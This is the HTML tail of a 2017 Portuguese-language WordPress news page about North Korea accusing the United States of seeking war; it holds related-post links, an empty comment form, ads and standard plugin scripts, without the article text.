		<a href="http://oiguassu.com/reuniao-alinha-acoes-entre-municipio-e-representantes-do-estado/" title="REUNIÃO ALINHA AÇÕES ENTRE MUNICÍPIO E REPRESENTANTES DO ESTADO"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2017/08/1-8-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2017/08/1-8-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2017/08/1-8-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2017/08/1-8-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2017/08/1-8-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="1013" data-permalink="http://oiguassu.com/reuniao-alinha-acoes-entre-municipio-e-representantes-do-estado/1-11/" data-orig-file="http://oiguassu.com/wp-content/uploads/2017/08/1-8.jpg" data-orig-size="500,313" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="1" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2017/08/1-8-300x188.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2017/08/1-8.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/reuniao-alinha-acoes-entre-municipio-e-representantes-do-estado/" title="REUNIÃO ALINHA AÇÕES ENTRE MUNICÍPIO E REPRESENTANTES DO ESTADO" rel="bookmark">
			REUNIÃO ALINHA AÇÕES ENTRE MUNICÍPIO E REPRESENTANTES DO ESTADO		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-436 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized tag-manchete2">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/prefeitura-abre-processo-seletivo-para-contratacao-de-estagiarios/" title="PREFEITURA ABRE PROCESSO SELETIVO PARA CONTRATAÇÃO DE ESTAGIÁRIOS"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2017/08/1-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2017/08/1-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2017/08/1-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2017/08/1-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2017/08/1-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="437" data-permalink="http://oiguassu.com/prefeitura-abre-processo-seletivo-para-contratacao-de-estagiarios/attachment/1/" data-orig-file="http://oiguassu.com/wp-content/uploads/2017/08/1.jpg" data-orig-size="500,313" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="1" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2017/08/1-300x188.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2017/08/1.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/prefeitura-abre-processo-seletivo-para-contratacao-de-estagiarios/" title="PREFEITURA ABRE PROCESSO SELETIVO PARA CONTRATAÇÃO DE ESTAGIÁRIOS" rel="bookmark">
			PREFEITURA ABRE PROCESSO SELETIVO PARA CONTRATAÇÃO DE ESTAGIÁRIOS		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator">		</div><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "COREIA DO NORTE ACUSA OS ESTADOS UNIDOS DE QUERER PROVOCAR UMA GUERRA"</span></h4>
</div>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/coreia-do-norte-acusa-os-estados-unidos-de-querer-provocar-uma-guerra/#respond" style="display:none;">Cancelar resposta</a></small></h3>			<form action="http://oiguassu.com/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='5239' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="eedfbb9347" /></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="54"/></p>			</form>
			</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2017 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
</footer>
	<div style="display:none">
	</div>

	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/oiguassu.com\/coreia-do-norte-acusa-os-estados-unidos-de-querer-provocar-uma-guerra\/":5239};
	</script>
<!--[if lte IE 8]>
<link rel='stylesheet' id='jetpack-carousel-ie8fix-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/modules/carousel/jetpack-carousel-ie8fix.css?ver=20121024' type='text/css' media='all' />
<![endif]-->
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201749'></script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2017Decaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.8.4'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/comment-reply.min.js?ver=4.8.4'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/wp-embed.min.js?ver=4.8.4'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/spin.js?ver=1.3'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/jquery.spin.js?ver=1.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"pt","ajaxurl":"http:\/\/oiguassu.com\/wp-admin\/admin-ajax.php","nonce":"967c2441f8","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Coment\u00e1rio","post_comment":"Publicar coment\u00e1rio","write_comment":"Escreva um Coment\u00e1rio","loading_comments":"Carregando coment\u00e1rios...","download_original":"Visualizar tamanho original <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Certifique-se de enviar algum texto com o seu coment\u00e1rio.","no_comment_email":"Informe um endere\u00e7o de e-mail para comentar.","no_comment_author":"Forne\u00e7a seu nome para comentar.","comment_post_error":"Desculpe, mas ocorreu um erro ao postar seu coment\u00e1rio. Tente novamente mais tarde.","comment_approved":"Seu coment\u00e1rio foi aprovado.","comment_unapproved":"Seu coment\u00e1rio est\u00e1 aguardando modera\u00e7\u00e3o.","camera":"C\u00e2mera","aperture":"Abertura","shutter_speed":"Velocidade do Obturador","focal_length":"Comprimento Focal","copyright":"Direito autoral","comment_registration":"0","require_name_email":"1","login_url":"http:\/\/oiguassu.com\/wp-login.php?redirect_to=http%3A%2F%2Foiguassu.com%2Fcoreia-do-norte-acusa-os-estados-unidos-de-querer-provocar-uma-guerra%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">E-mail (obrigat\u00f3rio)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Nome (obrigat\u00f3rio)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Site<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/modules/carousel/jetpack-carousel.js?ver=20170209'></script>
<script async="async" type='text/javascript' src='http://oiguassu.com/wp-content/plugins/akismet/_inc/form.js?ver=4.0.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/modules/sharedaddy/sharing.js?ver=5.4'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>
<script type='text/javascript' src='https://stats.wp.com/e-201749.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:5.4',blog:'12891280',post:'5239',tz:'-2',srv:'oiguassu.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '5239' ]);
</script>
</body>
</html>